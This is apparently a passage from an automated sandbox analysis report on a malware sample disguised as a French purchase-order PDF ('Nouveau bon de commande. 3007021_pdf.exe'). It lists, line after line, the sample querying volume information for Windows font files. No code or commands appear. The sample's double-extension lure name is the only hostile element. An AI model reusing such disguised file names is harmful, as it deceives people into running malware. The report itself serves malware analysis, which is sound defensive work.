Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation	Jump to behavior
